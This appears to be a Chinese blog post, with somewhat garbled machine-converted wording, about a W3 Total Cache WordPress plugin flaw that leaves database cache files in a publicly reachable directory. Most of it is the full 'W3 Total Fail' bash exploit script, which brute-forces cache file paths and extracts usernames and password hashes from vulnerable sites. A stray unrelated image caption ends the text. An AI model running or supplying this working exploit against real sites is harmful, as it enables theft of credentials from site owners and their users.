W3 Total Cache相信玩Wordpress都知道,是一款wp上非常流程的緩存插件,它可以動态頁面緩存、CSS\JS壓縮、資料庫緩存、CDN加速等,類似的插件還有WP Super Cache、DB Cache Reloaded等等。
日前,國外黑客Jason在網絡公布了該款插件的漏洞,安裝該插件之後,緩存中的資料被存儲在任意使用者可以通路的目錄,攻擊者可以利用該目錄擷取密碼hash值和其他的一些資料庫資訊。
W3 Total Cache插件存儲的資料在 “/wp-content/w3tc/dbcache/” ,攻擊者可以在該目錄浏覽和下載下傳緩存資料資訊。
<a href="http://git.zx2c4.com/w3-total-fail/tree/w3-total-fail.sh">http://git.zx2c4.com/w3-total-fail/tree/w3-total-fail.sh</a>
#!/bin/bash
#
# |---------------|
# | W3 Total Fail |
# | by zx2c4 |
# For more info, see built-in help text.
# This affects W3 Total Cache <= 0.9.2.4.
set -f
printf "\033[1m\033[31m"
echo "<===== W3 Total Fail =====>"
echo "< >"
echo "< by zx2c4 >"
echo "<=========================>"
echo
printf "\033[0m\033[1m"
echo "W3 Total Fail works by attempting to guess SQL queries that might"
echo "contain important password hashes. It walks through"
printf "\033[0m"
printf "\033[1m"
echo "until it's found the right files. If this directory has directory"
echo "index listings turned on, you might have more luck downloading the"
echo "entire folder and grepping locally for patterns, like so:"
echo " \$ grep -Ra user_pass ."
echo "If directory listings are not available, then this is the tool for"
echo "you, as it will try to brute force possible w3tc keys. It will try"
echo "25 user ids and 25 site ids. Adjust the script for more or less range."
echo "Enjoy!"
echo "- zx2c4"
echo "Dec 24, 2012"
printf "\033[0m\033[36m"
echo "Usage: $0 HOST [URLBASE] [DBPREFIX]"
echo "HOST should be the name of the host that is stored by wordpress. It"
echo "may be the actual host name of the server, or it might be something"
echo "different, depending on how wordpress is configured."
echo "Example: blog.zx2c4.com"
echo "URLBASE is the base URL of the wordpress blog which are prefixed in"
echo "DBPREFIX is the wordpress prefix used for database table names. It"
echo "is often \"wp_\", which DBPREFIX defaults to if this argument is"
echo "unspecified. Some wordpress installations will use an empty prefix,"
echo "and others use a site-specific prefix. Most, however, will use the"
echo "default."
echo "Example: wp_"
if [ $# -lt 1 ]; then
echo "Error: HOST is a required argument."
exit 1
fi
host="$1"
urlbase="${2:-http://$host}"
db_prefix="$3"
[ $# -lt 3 ] && db_prefix="wp_"
for site_id in {1..25} 0; do for user_id in {1..25}; do
query="SELECT * FROM ${db_prefix}users WHERE ID = '$user_id'"
key="w3tc_${host}_${site_id}_sql_$(echo -n "$query"|md5sum|cut -d ' ' -f 1)"
hash="$(echo -n "$key"|md5sum|cut -d ' ' -f 1)"
hash_path="${hash:0:1}/${hash:1:1}/${hash:2:1}/${hash}"
url="$urlbase/wp-content/w3tc/dbcache/$hash_path"
printf "\033[33m"
echo -n "Attempting"
printf "\033[0m"
echo " $url..."
curl -s "$url" | tail -c +5 | tr -d '\n' | sed -n 's/.*"user_login";s:[0-9]\+:"\([^"]*\)";s:[0-9]\+:"user_pass";s:[0-9]\+:"\([^"]*\)".*/\x1b[1m\x1b[32mUsername: \1\nPassword hash: \2\x1b[0m\n/p'
done; done
![【MySQL資料庫】資料庫索引事務1.索引2.事務[圖]](data:image/gif;base64,R0lGODlhAQABAIAAAP///wAAACwAAAAAAQABAAACAkQBADs=)